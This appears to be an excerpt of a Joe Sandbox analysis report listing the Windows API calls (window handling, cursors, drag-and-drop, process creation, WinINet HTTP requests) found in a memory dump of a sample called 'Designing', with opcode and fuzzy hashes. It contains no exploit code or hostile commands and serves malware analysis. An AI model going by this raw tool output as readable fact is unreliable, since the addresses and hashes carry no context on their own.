                                                                                                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E063A7
                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00E063BE
                                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00E063D3
                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00E063D9
                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00E063E9
                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00E063EF
                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E06410
                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E0642A
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00E06433
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E0649A
                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00E064D6
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00E064DC
                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00E064E3
                                                                                                                                                                              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00E0653A
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00E06547
                                                                                                                                                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 00E0656C
                                                                                                                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E06596
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 895679908-0
                                                                                                                                                                              • Opcode ID: 11a7b18ca6f4b2f68f3f907947b635f48771e39b29269a179a585c18b25d2276
                                                                                                                                                                              • Instruction ID: 0ad4cd4201700fa846177ca35bcbbc702f95822184358a43f1f7db1aff244f9f
                                                                                                                                                                              • Opcode Fuzzy Hash: 11a7b18ca6f4b2f68f3f907947b635f48771e39b29269a179a585c18b25d2276
                                                                                                                                                                              • Instruction Fuzzy Hash: A671AF31900709AFDB20DFA9DE4ABAEBBF5FF48704F101918E196B25A0C775E994CB50
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00E20884
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00E2088F
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00E2089A
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00E208A5
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00E208B0
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00E208BB
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00E208C6
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00E208D1
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00E208DC
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00E208E7
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00E208F2
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00E208FD
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00E20908
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00E20913
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00E2091E
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00E20929
                                                                                                                                                                              • GetCursorInfo.USER32(?), ref: 00E20939
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00E2097B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3215588206-0
                                                                                                                                                                              • Opcode ID: 8a54610d5b8355369cc4ca8b545bab9c8aece934a135965fd4f13b250e9a0f28
                                                                                                                                                                              • Instruction ID: eb11cb8a37b4a3c55cd3e1b911cd91ba6980f3e212eebdf2abb3b95b48fb394f
                                                                                                                                                                              • Opcode Fuzzy Hash: 8a54610d5b8355369cc4ca8b545bab9c8aece934a135965fd4f13b250e9a0f28
                                                                                                                                                                              • Instruction Fuzzy Hash: E34184B0D083196EDB109FB69C8985EBFA8FF44354B50452AA11DE7281D6749800CFA1
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: _wcslen
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k
• API String ID: 176396367-2171760788
• Opcode ID: ded9e5f09f1b5d0837ae17f50c1a5f67891b2dbdc3cd5c26403d4dc0445a725c
• Instruction ID: efbbf759b4e241d3af89171ddaa9160b617be9a04daf5c457f44461dd20c9a42
• Opcode Fuzzy Hash: ded9e5f09f1b5d0837ae17f50c1a5f67891b2dbdc3cd5c26403d4dc0445a725c
• Instruction Fuzzy Hash: 78E1C032A00616ABCB149F74C8817EDFBB8FF54754F14621AE456F7290DB30AEC597A0
APIs
  • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
• DragQueryPoint.SHELL32(?,?), ref: 00E39BA3
  • Part of subcall function 00E380AE: ClientToScreen.USER32(?,?), ref: 00E380D4
  • Part of subcall function 00E380AE: GetWindowRect.USER32(?,?), ref: 00E3814A
  • Part of subcall function 00E380AE: PtInRect.USER32(?,?,?), ref: 00E3815A
• SendMessageW.USER32(?,000000B0,?,?), ref: 00E39C0C
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E39C17
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E39C3A
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E39C81
• SendMessageW.USER32(?,000000B0,?,?), ref: 00E39C9A
• SendMessageW.USER32(?,000000B1,?,?), ref: 00E39CB1
• SendMessageW.USER32(?,000000B1,?,?), ref: 00E39CD3
• DragFinish.SHELL32(?), ref: 00E39CDA
• DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00E39DCD
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$($(
• API String ID: 221274066-1080139498
• Opcode ID: df602ff5799d7e186610d01323906b3b5ce1c0957f268a127d32b98c915a9737
• Instruction ID: 93f2902703c5b18f962a17400c96d0a9f1ba16b61ad8db01b258c37bc1b5b972
• Opcode Fuzzy Hash: df602ff5799d7e186610d01323906b3b5ce1c0957f268a127d32b98c915a9737
• Instruction Fuzzy Hash: 78615971108305AFC701EF61DC89D9BBFE8EFC9750F40091EF595A21A1DB719A49CB62
APIs
• __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00DC0436
  • Part of subcall function 00DC045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00E7170C,00000FA0,FA48386E,?,?,?,?,00DE2733,000000FF), ref: 00DC048C
  • Part of subcall function 00DC045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00DE2733,000000FF), ref: 00DC0497
  • Part of subcall function 00DC045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00DE2733,000000FF), ref: 00DC04A8
  • Part of subcall function 00DC045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00DC04BE
  • Part of subcall function 00DC045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00DC04CC
  • Part of subcall function 00DC045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00DC04DA
  • Part of subcall function 00DC045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00DC0505
  • Part of subcall function 00DC045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00DC0510
• ___scrt_fastfail.LIBCMT ref: 00DC0457
  • Part of subcall function 00DC0413: __onexit.LIBCMT ref: 00DC0419
Strings
• WakeAllConditionVariable, xrefs: 00DC04D2
• SleepConditionVariableCS, xrefs: 00DC04C4
• api-ms-win-core-synch-l1-2-0.dll, xrefs: 00DC0492
• kernel32.dll, xrefs: 00DC04A3
• InitializeConditionVariable, xrefs: 00DC04B8
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
• String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
• API String ID: 66158676-1714406822
• Opcode ID: b0ba69cd429c56b9db992233b688c3ff7a15cadad9e5fc19f230f65f1448c96b
• Instruction ID: 0084bdada052975dafa85b350506966c17fd46384a03ebdf3baf0e4635efa03a
• Opcode Fuzzy Hash: b0ba69cd429c56b9db992233b688c3ff7a15cadad9e5fc19f230f65f1448c96b
• Instruction Fuzzy Hash: 89210B32A4971AEFD7146BA5BC0AF6A7FA4DB05F61F04012DF905F7280DBB09C048A71
APIs
• CharLowerBuffW.USER32(00000000,00000000,00E3DCD0), ref: 00E14F6C
• _wcslen.LIBCMT ref: 00E14F80
• _wcslen.LIBCMT ref: 00E14FDE
• _wcslen.LIBCMT ref: 00E15039
• _wcslen.LIBCMT ref: 00E15084
• _wcslen.LIBCMT ref: 00E150EC
  • Part of subcall function 00DBFD52: _wcslen.LIBCMT ref: 00DBFD5D
• GetDriveTypeW.KERNEL32(?,00E67C10,00000061), ref: 00E15188
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: _wcslen$BuffCharDriveLowerType
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2055661098-1000479233
• Opcode ID: 058a8b1bfdd20517a097e2380e491c9cb96b148e0eb4e5ac8cbe18919b942b7d
• Instruction ID: 861b703195d4c8af2d61a637064bd3be90a29f41b045dbe516c022c9b94ae67f
• Opcode Fuzzy Hash: 058a8b1bfdd20517a097e2380e491c9cb96b148e0eb4e5ac8cbe18919b942b7d
• Instruction Fuzzy Hash: 97B10532608702DFC310DF28C890AAAB7E5FFD9768F50591DF496A3291D770D885CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E2BBF8
                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E2BC10
                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E2BC34
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E2BC60
                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E2BC74
                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E2BC96
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E2BD92
                                                                                                                                                                                • Part of subcall function 00E10F4E: GetStdHandle.KERNEL32(000000F6), ref: 00E10F6D
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E2BDAB
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E2BDC6
                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E2BE16
                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 00E2BE67
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00E2BE99
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00E2BEAA
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00E2BEBC
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00E2BECE
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00E2BF43
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2178637699-0
                                                                                                                                                                              • Opcode ID: df3f73d2a26876765a62a97e832c399bee655e460da79daf3d6c423b9c377c90
                                                                                                                                                                              • Instruction ID: d80f91edb7286e5e2aca337c148f3bc7a76230dd33ddcefbdab1893c0056f99c
                                                                                                                                                                              • Opcode Fuzzy Hash: df3f73d2a26876765a62a97e832c399bee655e460da79daf3d6c423b9c377c90
                                                                                                                                                                              • Instruction Fuzzy Hash: B6F1DF31604311DFC714EF24D891B6ABBE1EF85314F18995DF895AB2A2CB71EC44CB62
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00E3DCD0), ref: 00E24B18
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E24B2A
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00E3DCD0), ref: 00E24B4F
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00E3DCD0), ref: 00E24B9B
                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028,?,00E3DCD0), ref: 00E24C05
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000009), ref: 00E24CBF
                                                                                                                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E24D25
                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00E24D4F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                              • API String ID: 354098117-199464113
                                                                                                                                                                              • Opcode ID: fa6b2cbda59661d4314dc16158224ef7d768f7c95c2b3597733620c64572f166
                                                                                                                                                                              • Instruction ID: e007f216ca9855fb6be7b5bd26de1a3081e635d2a37b6b02c036ada7cab1957b
                                                                                                                                                                              • Opcode Fuzzy Hash: fa6b2cbda59661d4314dc16158224ef7d768f7c95c2b3597733620c64572f166
                                                                                                                                                                              • Instruction Fuzzy Hash: 93124DB1A00119EFDB14CF54D884EAABBB5FF85318F159098E905AB291D731EE46CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetMenuItemCount.USER32(00E729C0), ref: 00DE3F72
                                                                                                                                                                              • GetMenuItemCount.USER32(00E729C0), ref: 00DE4022
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00DE4066
                                                                                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 00DE406F
                                                                                                                                                                              • TrackPopupMenuEx.USER32(00E729C0,00000000,?,00000000,00000000,00000000), ref: 00DE4082
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00DE408E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 36266755-4108050209
                                                                                                                                                                              • Opcode ID: 8c36ac2503f8e166c4c6cbfad22dbb3f389d6db89084a39adfaac88f7a8ba979
                                                                                                                                                                              • Instruction ID: eb7dac273ad9bf7c8c658ad08e5328b74aee14026835b2aa04422e9886e759ed
                                                                                                                                                                              • Opcode Fuzzy Hash: 8c36ac2503f8e166c4c6cbfad22dbb3f389d6db89084a39adfaac88f7a8ba979
                                                                                                                                                                              • Instruction Fuzzy Hash: 98712630A04245BFEB219F2ADC4DFAABFA5FF05724F140215F514661E1C7719910D760
                                                                                                                                                                              APIs
                                                                                                                                                                              • DestroyWindow.USER32(00000000,?), ref: 00E37823
                                                                                                                                                                                • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
                                                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E37897
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E378B9
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E378CC
                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00E378ED
                                                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00DA0000,00000000), ref: 00E3791C
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E37935
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00E3794E
                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00E37955
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E3796D
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E37985
                                                                                                                                                                                • Part of subcall function 00DA2234: GetWindowLongW.USER32(?,000000EB), ref: 00DA2242
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                              • String ID: 0$tooltips_class32
                                                                                                                                                                              • API String ID: 2429346358-3619404913
                                                                                                                                                                              • Opcode ID: e96994a40cd726b0cfff8fab846c2f1213e16fd87d0aed7347e0db4ed337fe9e
                                                                                                                                                                              • Instruction ID: 1d6e8001ee2b07b5e39ae60f6242a06c520338c0f86dfef4cb90d9b8e80ae9a8
                                                                                                                                                                              • Opcode Fuzzy Hash: e96994a40cd726b0cfff8fab846c2f1213e16fd87d0aed7347e0db4ed337fe9e
                                                                                                                                                                              • Instruction Fuzzy Hash: 117198B0508244AFD725CF19DC48F7ABBF9EBC9308F04551EF985A7261C770A94ADB21
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DA1488,?,00000000,?,?,?,?,00DA145A,00000000,?), ref: 00DA1865
                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00DA1521
                                                                                                                                                                              • KillTimer.USER32(00000000,?,?,?,?,00DA145A,00000000,?), ref: 00DA15BB
                                                                                                                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00DE29B4
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00DA145A,00000000,?), ref: 00DE29E2
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00DA145A,00000000,?), ref: 00DE29F9
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00DA145A,00000000), ref: 00DE2A15
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00DE2A27
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                              • String ID: <)
                                                                                                                                                                              • API String ID: 641708696-200976629
• Opcode ID: e68b53503a04399cc99d9709d45c3a89a78b0a27b592c981ca0146d3a56b97eb
• Instruction ID: 279ddf4e8820477f9b49c31bcc81c86818a84fd3f3df32e0e0b8cabaa81f4479
• Opcode Fuzzy Hash: e68b53503a04399cc99d9709d45c3a89a78b0a27b592c981ca0146d3a56b97eb
• Instruction Fuzzy Hash: 7C618A34905745DFCB39DF1AD948B3A7BB5FB81322F18441CE1866A660C770E895CFA0
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E1CEF5
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00E1CF08
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00E1CF1C
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00E1CF35
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00E1CF78
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00E1CF8E
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E1CF99
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E1CFC9
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00E1D021
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00E1D035
